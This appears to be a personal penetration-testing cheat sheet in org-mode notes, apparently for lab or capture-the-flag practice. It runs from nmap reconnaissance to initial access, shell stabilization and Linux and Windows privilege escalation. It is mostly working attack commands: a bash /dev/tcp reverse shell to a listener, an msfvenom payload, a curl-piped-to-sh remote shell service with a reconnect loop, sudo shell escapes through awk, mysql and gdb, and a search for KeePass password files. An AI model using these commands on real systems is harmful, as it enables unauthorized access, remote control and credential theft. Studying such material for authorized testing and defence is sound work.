**** to install:
- magic wormhole
- tldr
- rlwrap
#+BEGIN_SRC bash
sudo apt update --fix-missing && sudo apt install magic-wormhole tealdeer rlwrap
#+END_SRC
**** for keyring -> if there is some kind of keyring error
#+BEGIN_SRC bash
sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg
#+END_SRC

* information gathering
*** nmap
for a quick scan of available ips
#+BEGIN_SRC bash
nmap -sn ip/24
#+END_SRC
to filter the output down to the live ips
#+BEGIN_SRC bash
nmap -sn 192.168.1.0/24 | grep "for " | awk '{print $5}' > ips.txt
#+END_SRC
scan open ports (inner nmap lists all open ports, outer nmap runs scripts/version detection only on those):
#+BEGIN_SRC bash
nmap -sCV -A -p $(nmap 192.168.1.155 -p- | grep open | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/.$//') 192.168.1.155
#+END_SRC
*** dirb
#+BEGIN_SRC bash
dirb http://ip
#+END_SRC
**** on Windows
#+BEGIN_SRC bash
nmap --script vuln ip
#+END_SRC
***** on Windows + SMB
#+BEGIN_SRC bash
nmap --script "smb-vuln*" ip
#+END_SRC

* initial access
*** start listener:
#+BEGIN_SRC bash
rlwrap -cAr nc -nlvp 9002
#+END_SRC
*** reverse shell bash:
#+BEGIN_SRC bash
/bin/bash -i >& /dev/tcp/192.168.1.157/9002 0>&1
#+END_SRC
*** reverse shell file:
#+BEGIN_SRC bash
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.157 LPORT=9002 -f raw -o rev.py
#+END_SRC
-> from revshells.com
*** untested: Reverse Shell as a Service
1. On your machine:
#+BEGIN_SRC bash
nc -l 1337   # or nlvp?
#+END_SRC
2. On the target machine:
#+BEGIN_SRC bash
curl https://reverse-shell.sh/yourip:1337 | sh
#+END_SRC
**** reconnecting:
#+BEGIN_SRC bash
while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done
#+END_SRC

* privilege escalation
** always run these:
#+BEGIN_SRC bash
sudo -l
#+END_SRC
if sudo doesn't work: [[*TTY Spawn Shell]]
**** check cronjobs
#+BEGIN_SRC bash
ls /etc/cron.*
crontab -l
#+END_SRC
** TTY Spawn Shell
***** if sudo still doesn't work use
#+BEGIN_SRC bash
sudo -S command
#+END_SRC
Often during pen tests you may obtain a shell without having a tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.
*** Python spawn shell
#+BEGIN_SRC bash
python -c 'import pty; pty.spawn("/bin/bash")'
#+END_SRC
Fully Interactive TTY
**** All the steps to stabilize your shell
**The first step:**
#+BEGIN_SRC bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
#+END_SRC
Which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still won't be able to use tab autocomplete or the arrow keys.
**Step two is:**
#+BEGIN_SRC bash
export TERM=xterm
#+END_SRC
This will give us access to term commands such as clear.
**Finally (and most importantly) we will background the shell using**
#+BEGIN_SRC bash
# Ctrl + Z   (a keystroke, not a command: suspends the reverse shell)
#+END_SRC
Back in our own terminal we use
#+BEGIN_SRC bash
stty raw -echo; fg
#+END_SRC
This does two things: first, it turns off our own terminal echo, which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes; second, =fg= brings the backgrounded shell back to the foreground. Then, inside the reverse shell, set the terminal size to match your own window:
#+BEGIN_SRC bash
stty rows 38 columns 116
#+END_SRC
*** OS system spawn shell
#+BEGIN_SRC bash
python -c 'import os; os.system("/bin/bash")'
#+END_SRC
*** Bash spawn shell
#+BEGIN_SRC bash
/bin/sh -i
#+END_SRC
*** Perl spawn shell
#+BEGIN_SRC bash
perl -e 'exec "/bin/sh";'
#+END_SRC
*** Ruby spawn shell
#+BEGIN_SRC ruby
exec "/bin/sh"
#+END_SRC
*** Lua spawn shell
#+BEGIN_SRC lua
os.execute("/bin/sh")
#+END_SRC
*** IRB spawn shell
#+BEGIN_SRC ruby
exec "/bin/sh"
#+END_SRC
*** VI spawn shell
#+BEGIN_SRC bash
# typed inside vi:
:!bash
#+END_SRC
*** VI(2) spawn shell
#+BEGIN_SRC bash
# typed inside vi:
:set shell=/bin/bash:shell
#+END_SRC
*** Nmap spawn shell
#+BEGIN_SRC bash
# typed inside nmap --interactive (older nmap versions only):
!sh
#+END_SRC
**** Exiftool: read metadata
#+BEGIN_SRC bash
exiftool picture.png
#+END_SRC
Binwalk (extract embedded binary data):
#+BEGIN_SRC bash
binwalk -e picture.png
#+END_SRC

* Windows
*** WinPEAS
https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS
*** LOLBAS
https://lolbas-project.github.io/#
*** WADCOMS
https://wadcoms.github.io/
*** PrivescCheck
Script as an alternative to WinPEAS
https://github.com/itm4n/PrivescCheck
*** RUN these while the other scripts are working
#+BEGIN_SRC powershell
whoami /priv
whoami /all
schtasks /query
#+END_SRC
*** for finding kdbx files
https://github.com/ivanmrsulja/keepass2john
#+BEGIN_SRC powershell
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
#+END_SRC
quick wins Linux:
#+BEGIN_SRC bash
gdb -nx -ex '!sh' -ex quit
sudo mysql -e '! /bin/sh'
strace -o /dev/null /bin/sh
sudo awk 'BEGIN {system("/bin/sh")}'
#+END_SRC
evilwinrm